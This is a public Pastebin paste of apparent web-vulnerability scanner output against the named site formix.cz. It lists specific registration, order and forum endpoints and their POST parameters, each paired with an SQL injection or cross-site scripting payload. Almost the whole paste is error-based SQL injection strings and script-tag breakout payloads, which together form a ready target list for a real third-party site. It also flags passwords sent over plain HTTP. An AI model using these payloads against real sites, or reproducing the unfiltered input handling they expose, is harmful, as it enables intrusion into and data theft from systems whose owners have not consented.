API tools faq
paste
Advertisement
sroub3k

formix.cz

sroub3k
Sep 3rd, 2011
409
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.66 KB | None | 0 0
raw download clone embed print report
  1. [High Possibility] SQL Injection
  2.  
  3. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  4.  
  5. http://www.formix.cz/skript/reg.php
  6. Parameter Name: jmeno
  7. Parameter Type: Post
  8. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  9.  
  10. http://www.formix.cz/skript/reg.php
  11. Parameter Name: email
  12. Parameter Type: Post
  13. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  14.  
  15. http://www.formix.cz/skript/reg.php
  16. Parameter Name: jmeno
  17. Parameter Type: Post
  18. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  19.  
  20. http://www.formix.cz/skript/reg.php
  21. Parameter Name: email
  22. Parameter Type: Post
  23. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  24.  
  25. http://www.formix.cz/skript/reg.php
  26. Parameter Name: jmeno
  27. Parameter Type: Post
  28. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  29.  
  30. http://www.formix.cz/skript/reg.php
  31. Parameter Name: kde
  32. Parameter Type: Post
  33. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  34.  
  35. http://www.formix.cz/skript/reg.php
  36. Parameter Name: kde
  37. Parameter Type: Post
  38. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  39.  
  40. http://www.formix.cz/skript/reg.php
  41. Parameter Name: kde
  42. Parameter Type: Post
  43. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  44.  
  45. http://www.formix.cz/skript/obj.php
  46. Parameter Name: licence
  47. Parameter Type: Post
  48. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  49.  
  50. http://www.formix.cz/skript/obj.php
  51. Parameter Name: licence
  52. Parameter Type: Post
  53. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  54.  
  55. http://www.formix.cz/skript/obj.php
  56. Parameter Name: platba
  57. Parameter Type: Post
  58. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  59.  
  60. http://www.formix.cz/skript/obj.php
  61. Parameter Name: platba
  62. Parameter Type: Post
  63. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  64.  
  65. http://www.formix.cz/skript/obj.php
  66. Parameter Name: licence
  67. Parameter Type: Post
  68. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  69.  
  70. http://www.formix.cz/skript/obj.php
  71. Parameter Name: licence
  72. Parameter Type: Post
  73. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  74.  
  75. http://www.formix.cz/skript/obj.php
  76. Parameter Name: platba
  77. Parameter Type: Post
  78. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  79.  
  80. http://www.formix.cz/skript/obj.php
  81. Parameter Name: platba
  82. Parameter Type: Post
  83. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  84.  
  85. http://www.formix.cz/skript/obj.php
  86. Parameter Name: licence
  87. Parameter Type: Post
  88. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  89. --------------------------------------------------------------------------------------------
  90.  
  91. XSS
  92. Cross-site Scripting
  93.  
  94. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  95.  
  96. http://www.formix.cz/skript/obj.php
  97. Parameter Name: email
  98. Parameter Type: Post
  99. Attack Pattern: '"--></style></script><script>alert(0x0001DC)</script>
  100.  
  101. http://www.formix.cz/skript/obj.php
  102. Parameter Name: licence
  103. Parameter Type: Post
  104. Attack Pattern: '"--></style></script><script>alert(0x000269)</script>
  105.  
  106. http://www.formix.cz/skript/obj.php
  107. Parameter Name: platba
  108. Parameter Type: Post
  109. Attack Pattern: '"--></style></script><script>alert(0x0002A8)</script>
  110.  
  111. http://www.formix.cz/skript/obj.php
  112. Parameter Name: platba
  113. Parameter Type: Post
  114. Attack Pattern: '"--></style></script><script>alert(0x00031B)</script>
  115.  
  116. http://www.formix.cz/skript/obj.php
  117. Parameter Name: licence
  118. Parameter Type: Post
  119. Attack Pattern: '"--></style></script><script>alert(0x000322)</script>
  120.  
  121. http://www.formix.cz/skript/obj.php
  122. Parameter Name: licence
  123. Parameter Type: Post
  124. Attack Pattern: '"--></style></script><script>alert(0x000362)</script>
  125.  
  126. http://www.formix.cz/skript/obj.php
  127. Parameter Name: email
  128. Parameter Type: Post
  129. Attack Pattern: '"--></style></script><script>alert(0x00037B)</script>
  130.  
  131. http://www.formix.cz/skript/obj.php
  132. Parameter Name: email
  133. Parameter Type: Post
  134. Attack Pattern: '"--></style></script><script>alert(0x0003B2)</script>
  135.  
  136. http://www.formix.cz/skript/obj.php
  137. Parameter Name: platba
  138. Parameter Type: Post
  139. Attack Pattern: '"--></style></script><script>alert(0x0003CD)</script>
  140.  
  141. http://www.formix.cz/skript/obj.php
  142. Parameter Name: licence
  143. Parameter Type: Post
  144. Attack Pattern: '"--></style></script><script>alert(0x0003D1)</script>
  145.  
  146. http://www.formix.cz/skript/obj.php
  147. Parameter Name: email
  148. Parameter Type: Post
  149. Attack Pattern: '"--></style></script><script>alert(0x00043B)</script>
  150.  
  151. http://www.formix.cz/skript/obj.php
  152. Parameter Name: platba
  153. Parameter Type: Post
  154. Attack Pattern: '"--></style></script><script>alert(0x000470)</script>
  155.  
  156. http://www.formix.cz/skript/obj.php
  157. Parameter Name: licence
  158. Parameter Type: Post
  159. Attack Pattern: '"--></style></script><script>alert(0x000475)</script>
  160.  
  161. http://www.formix.cz/skript/obj.php
  162. Parameter Name: email
  163. Parameter Type: Post
  164. Attack Pattern: '"--></style></script><script>alert(0x0004DC)</script>
  165. --------------------------------------------------------------------------------------------
  166.  
  167. [Possible] Cross-site Scripting
  168.  
  169. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  170. Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability
  171. might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
  172.  
  173. http://www.formix.cz/skript/reg.php
  174. Parameter Name: jmeno
  175. Parameter Type: Post
  176. Attack Pattern: '"--></style></script><script>netsparker(0x0001A2)</script>
  177.  
  178. http://www.formix.cz/skript/reg.php
  179. Parameter Name: email
  180. Parameter Type: Post
  181. Attack Pattern: '"--></style></script><script>netsparker(0x0001BD)</script>
  182.  
  183. http://www.formix.cz/skript/reg.php
  184. Parameter Name: jmeno
  185. Parameter Type: Post
  186. Attack Pattern: '"--></style></script><script>netsparker(0x0001CD)</script>
  187.  
  188. http://www.formix.cz/skript/reg.php
  189. Parameter Name: jmeno
  190. Parameter Type: Post
  191. Attack Pattern: '"--></style></script><script>netsparker(0x0001E5)</script>
  192.  
  193. http://www.formix.cz/skript/reg.php
  194. Parameter Name: email
  195. Parameter Type: Post
  196. Attack Pattern: '"--></style></script><script>netsparker(0x0001F0)</script>
  197.  
  198. http://www.formix.cz/skript/reg.php
  199. Parameter Name: kde
  200. Parameter Type: Post
  201. Attack Pattern: '"--></style></script><script>netsparker(0x000213)</script>
  202.  
  203. http://www.formix.cz/skript/reg.php
  204. Parameter Name: kde
  205. Parameter Type: Post
  206. Attack Pattern: '><script>netsparker(9)</script>
  207. --------------------------------------------------------------------------------------------
  208. Password Transmitted Over HTTP
  209.  
  210. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  211.  
  212. http://www.formix.cz/forum/index.php
  213. Form target action: login.php
  214.  
  215. http://www.formix.cz/forum/login.php
  216. Form target action: login.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!